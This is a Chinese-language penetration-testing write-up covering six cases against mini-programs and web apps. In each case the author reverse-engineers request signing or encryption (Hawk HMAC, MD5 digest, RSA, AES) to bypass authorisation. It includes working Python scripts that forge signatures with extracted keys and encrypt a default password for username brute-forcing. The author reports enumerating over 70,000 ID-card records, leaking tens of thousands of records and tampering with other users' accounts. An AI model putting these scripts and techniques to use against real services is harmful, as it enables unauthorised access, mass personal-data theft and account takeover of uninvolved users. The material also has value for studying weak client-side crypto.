本文通过六个真实渗透测试案例,深入剖析小程序与Web端常见的加密鉴权机制,手把手演示如何通过反编译、动态调试、JS逆向与脚本复现,精准定位加密逻辑、还原签名算法,并最终实现越权访问、信息遍历与账号接管。
案例一
某天对小程序进行登录时发现登录进去这个接口有个personalid参数,发现也是返回了个人信息,一开始还以为是一个改id进行越权的简单漏洞,但是当我再次发包以后显示时间ts有问题,改了ts以后又说nonce有问题,到最后改了nonce,发现mac又有问题,这里就大概了解了大概的一个鉴权(ts,nonce要变化)


到这里就可以发现是mac参数进行的鉴权,由于是小程序,所以反编译一下源码
这里全局搜一下mac

代码如下:
var o = {
ts: a,
nonce: i.nonce || e.utils.randomString(6),
method: n,
resource: r.resource,
host: r.host,
port: r.port,
hash: i.hash,
ext: i.ext,
app: i.app,
dlg: i.dlg
},
c = e.crypto.calculateMac("header", s, o),
h = 'Hawk id="' + s.id + '",ts="' + o.ts + '",nonce="' + o.nonce + '",mac="' + c + '"';
这里的o是ts,nonce,method,resource,host,port这些组合起来的
可以看见mac是等于c的,其实就是请求方式和url及认证头里面的东西组合起来进行了一个加密
跟进一下e.crypto.calculateMac
全局搜索

加密逻辑
e.crypto = {
headerVersion: "1",
algorithms: ["sha1", "sha256"],
calculateMac: function(t, r, n) {
var i = e.crypto.generateNormalizedString(t, n);
return s["Hmac" + r.algorithm.toUpperCase()](i, r.key).toString(s.enc.Base64)
}
这里对calculateMac 函数分析,这个函数是该对象的核心,它接受三个参数:
t: 原始数据。r: 包含算法和密钥的对象。这个对象内部有r.algorithm(指定哈希算法,例如"sha1"或"sha256") 和r.key(用于HMAC计算的密钥)。n: 也就是o。
var i = e.crypto.generateNormalizedString(t, n);
- 首先,调用
e.crypto.generateNormalizedString函数,传入t和n参数。 - 这个函数将上一步准备好的
o对象(以及其他输入,如t)按照 Hawk 协议的特定规则进行排序和拼接,生成一个唯一的、标准化的字符串。这样的话就确保不管数据在原始对象中的顺序如何,只要内容不变,生成的标准化字符串就始终一致。这对于防止因数据顺序不一致而导致的签名验证失败
return s["Hmac" + r.algorithm.toUpperCase()](i, r.key).toString(s.enc.Base64)
- 这行代码是实际进行HMAC计算和格式化的部分。
r.algorithm.toUpperCase(): 将传入的算法名称转换为大写,例如sha1变为SHA1。"Hmac" + r.algorithm.toUpperCase(): 动态构建HMAC算法名称,例如"HmacSHA1"或"HmacSHA256"。s["Hmac..."](i, r.key): 使用标准化字符串i和密钥r.key来调用 HMACC 算法进行计算,返回一个HMAC结果。.toString(s.enc.Base64): 将计算出的HMAC结果转换为Base64编码的字符串,并作为函数的最终返回值。
这里就需要找到key了
一开始全局搜索key但是太多了
然后联想到一般key都会放在配置文件里面
搜了一下config

写个脚本试一下能不能使用
import base64
import hmac
import hashlib
import time
def generate_normalized_string(header_type, artifacts):
"""生成 Hawk 规范化字符串"""
n = f"hawk.1.{header_type}\n"
n += f"{artifacts['ts']}\n"
n += f"{artifacts['nonce']}\n"
n += f"{artifacts['method'].upper()}\n"
n += f"{artifacts['resource']}\n"
n += f"{artifacts['host'].lower()}\n"
n += f"{artifacts['port']}\n"
n += f"{artifacts['hash']}\n" # 空字符串
# 无 ext 参数
n += "\n"
# 无 app 和 dlg 参数
return n
def calculate_mac(credentials, artifacts):
"""计算 Hawk MAC 值"""
normalized_str = generate_normalized_string("header", artifacts)
print("规范化字符串:")
print("----------------------")
print(normalized_str)
print("----------------------")
key_bytes = credentials["key"].encode("utf-8")
msg_bytes = normalized_str.encode("utf-8")
# 使用 SHA-256
hmac_digest = hmac.new(key_bytes, msg_bytes, hashlib.sha256).digest()
return base64.b64encode(hmac_digest).decode("utf-8")
# 输入参数
credentials = {
"id": "wasx",
"key": "edb8bc95-a000-4ca0-81b8-dd2145050a70F61FB1981510CE5D3988193864A328A3",
"algorithm": "sha256"
}
timestamp = time.time()
timestamps=int(timestamp)
artifacts = {
"ts": timestamps,
"nonce": "6a0d5d576135004ead6cf4795e5b6112", "method": "GET",
"resource": "xxxx/List/QueryByPersonalid?personalid=668223",
"host": "xxxxxxx",
"port": "443",
"hash": ""
}
# 计算并验证 MAC
calculated_mac = calculate_mac(credentials, artifacts)
print(f"计算 MAC: {calculated_mac}")
发现可以使用,后续也是遍历了7w+的sfz信息

案例二
这里是一个预约功能的地方,需要填写个人信息包括了身份证号,可以看见有个personCode参数,后面跟了一串数字,然后下滑可以发现返回了个人信息,原本想遍历一下这个参数的,但是说参数过期了,想都不要想肯定是digest加密导致的


一样的方法反编译一下
找到加密地方

这个就比较简单了,只有有个hexMD5加密
简单分析一下代码
var n = a.domainUrl(o.domain).match(/[^\/]+$/)[1]
这个正则表达式是匹配字符串末尾的非斜杠字符。例如,如果 a.domainUrl(o.domain) 返回 “https://example.com/api“,那么它会匹配 “api”
u = o.url.includes("?") ? o.url.split("?")[0] : o.url
- 这行代码处理 URL,去除查询参数。
o.url.includes("?"):检查o.url字符串是否包含问号?。o.url.split("?")[0]:如果包含?,则用?分割 URL 字符串,并取第一个部分,即问号之前的部分。
digest: t.hexMD5("/".concat(n, "/") + u + s).toUpperCase()
"/".concat(n, "/"):将字符串n用斜杠包裹起来。例如,如果n是 “api”,结果就是 “/api/”。+ u + s:将上一步的结果、不带参数的 URLu和时间戳s拼接在一起。t.hexMD5(...):调用一个名为t的对象上的hexMD5方法,对拼接后的字符串进行 MD5 哈希计算。MD5 是一种常见的哈希算法,用于生成一个唯一的、固定长度的散列值。.toUpperCase():将生成的 MD5 散列值转换为大写。
分析完毕,开始写脚本:
import re
import hashlib
import time
def calculate_digest(domain, url, timestamp):
# 提取domain的最后路径片段
match = re.search(r'\/([^\/]+)\/?$', domain)
if not match:
raise ValueError("Invalid domain format")
n = match.group(1)
# 去掉URL的查询参数
u = url.split('?', 1)[0]
# 拼接字符串
s = f"/{n}/{u}{timestamp}"
# 计算MD5并转大写
return hashlib.md5(s.encode('utf-8')).hexdigest().upper()
# 示例调用
if __name__ == "__main__":
domain = 'xxxxx'
url = 'xxxxx'
timestamp = int(time.time() * 1000) # 获取毫秒级时间戳
print("Timestamp:", timestamp)
digest = calculate_digest(domain, url, timestamp)
print("digest:", digest)

案例三
这里说一下快速找到加密点的方法

xhr打断点进行定位加密,选一个标志性的进行定位

加入xhr

刷新页面,断住了,接下来看它的作用域来寻找加密参数

往上跟栈,发现加密参数

再往上跟几个栈,找到最后一个出现加密参数的地方

接下来直接上案例
这个是web端的js逆向,在查看网页源代码的时候发现了默认密码111111,并且没有验证码校验,这里大概的一个攻击思路就是固定密码爆破用户名

但是在抓包的时候发现,password被加密了

这里又需要js逆向了
一开始是搜索加密参数,然后挨个看了下发现加密函数

rsa.setPublic(modulus, exponent)
**modulus**(模数):这是一个非常大的数字,这里用十六进制字符串表示。它是 RSA 密钥对的核心部分。从其长度(256个字符)来看,这是一个 1024 位的密钥。**exponent**(公钥指数):值为"10001",这是一个常用的公钥指数,它的十六进制值是65537。选择这个值是因为它是一个质数,且二进制表示中只有两个1,可以加快加密运算的速度。rsa.setPublic()方法将这两个值设置为rsa对象的公钥,使其准备好进行加密。
跟进一下这个加密函数

var m = pkcs1pad2(text,(this.n.bitLength()+7)>>3);
**pkcs1pad2**是一个填充函数,它根据 PKCS #1 v1.5 标准对明文进行填充,确保明文的长度适合加密。this.n代表 RSA 密钥对中的 模数(modulus)。this.n.bitLength()获取模数的位长度。(this.n.bitLength() + 7) >> 3是一个计算字节长度的位运算技巧,等同于Math.ceil(this.n.bitLength() / 8)。它确保填充后的数据长度与 RSA 密钥的长度匹配。- 如果填充失败,函数返回
null。
var c = this.doPublic(m);
**this.doPublic(m)**是执行 RSA 公钥加密的核心操作。它使用 RSA 公钥(模数**n**和 公钥指数**e**)将填充后的明文m进行加密。- 加密公式为:c=me(modn),其中
c是密文,m是填充后的明文,e是公钥指数,n是模数。 - 如果加密失败,函数返回
null。
var h = c.toString(16);
c通常是一个大数对象,toString(16)将其转换为十六进制字符串h。if((h.length & 1) == 0) return h; else return "0" + h;- 这是一个确保十六进制字符串长度为偶数的检查。
接下来就可以写加密脚本了
import base64
from cryptography.hazmat.primitives import serialization, padding
from cryptography.hazmat.primitives.asymmetric import rsa, padding as asymmetric_padding
from cryptography.hazmat.backends import default_backend
# 1. 设置公钥的模数和指数
modulus_hex = "B87A3BE2184FED0973FFB0B02A862DCAD15A1A29172EC8FF67E841FE26749A6AA04E48E9B02D963ED81DCE2B0086C034F7D47CCBACF8539C36B9445ABA5EF484F3CA32593762641B4C9683C79801D087198370D5719BB4E422FADAA4D883D13874DE67D8B6E883EBAACC53A8480F41EE8BE70D2F70BECF3CB7F1023D2C901CC3"
exponent_hex = "10001"
# 将十六进制字符串转换为整数
n = int(modulus_hex, 16)
e = int(exponent_hex, 16)
public_numbers = rsa.RSAPublicNumbers(e, n)
public_key = public_numbers.public_key(default_backend())
# 3. 定义加密函数
def rsa_encrypt(plaintext, public_key):
ciphertext = public_key.encrypt(
plaintext.encode('utf-8'),
asymmetric_padding.PKCS1v15()
)
# 转换为十六进制字符串,并确保长度为偶数
hex_ciphertext = ciphertext.hex()
if len(hex_ciphertext) % 2 != 0:
hex_ciphertext = '0' + hex_ciphertext
return hex_ciphertext
psw = "111111"
# 4. 执行加密
encrypted_psw = rsa_encrypt(psw, public_key)
print(f"待加密的明文: {psw}")
print(f"加密后的密文: {encrypted_psw}")
print(f"密文长度: {len(encrypted_psw)} 字符")
案例四
这里在一个数据包里面发现了一个密钥

这里发现账户鉴权的参数是account,js翻到是rsa加密
function encrypt(username, privatKey) {
const encrypt = new JSEncrypt();
encrypt.setPublicKey(privatKey);
const encrypted = encrypt.encrypt(username);
if (encrypted) {
return encrypted;
}
只需要提供用户名和密钥就可以加密了,由于这里已经有了密钥,那直接控制台调用就好了

普通用户登录后,发现了管理员用户名,同样的方法加密

直接泄露了几万条数据

案例五
这里是小程序的一个注销功能

注销账号为post方式的加密数据,这里就需要对小程序进行js逆向调试

这里我们根据路由来找加密点

js逆向动态调试的好处就是可以修改数值,它也会自动生成密文,这里就直接动调的时候给手机号改了,就可以了

案例六

小程序这里有个保存用户信息的地方,抓包可以看到也是被加密了,这里返回了一个yhgrid

对小程序的如下JS进行断点调试:抓取修改用户地址信息接口,报文加密为AES-CBC-ZERO,key和iv为UKU0m5xBbOa/Lz==,再加上url编码解密可得


修改grid

发包修改成功

再次查看用户信息,发现被成功修改了

通过对六个典型场景的拆解,我们不难发现:“加密 ≠ 安全”。无论是Hawk协议中的动态签名、MD5时间戳校验,还是RSA/AES等标准加密算法,其安全性高度依赖于密钥管理、参数时效性与实现细节。一旦密钥泄露、nonce可预测、ts未严格校验,或加密逻辑被完整逆向,整个鉴权体系将形同虚设。









请登录后查看回复内容